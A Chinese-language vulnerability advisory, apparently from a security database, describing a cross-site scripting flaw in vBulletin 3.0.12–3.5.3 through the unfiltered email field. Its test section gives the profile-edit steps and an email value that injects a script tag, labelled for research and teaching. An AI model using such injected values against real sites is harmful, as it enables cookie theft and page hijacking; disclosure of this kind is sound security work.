发布日期：2006-03-02
更新日期：2006-03-02

受影响系统：

VBulletin VBulletin 3.0.12 - 3.5.3

描述：

---

vBulletin是一款开放源代码PHP论坛程序。

由于没有过滤用户信息“email”字段中的引号和“&”字符导致vBulletin中存在跨站脚本漏洞。成功利用这个漏洞的攻击者可以窃取cookies、劫持网页等。

<*来源：imei addmimistrator （addmimistrator@gmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=114134166125084&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/forum/profile.php?do=editpassword
pass:your pass
email: imei@myimei.com”><script>alert(1)</script>.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
forum/sendmessage.php?do=mailmember&u={your id}

建议：

---

厂商补丁：

VBulletin
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.vbulletin.com/

浏览次数：4060
严重程度：0（网友投票）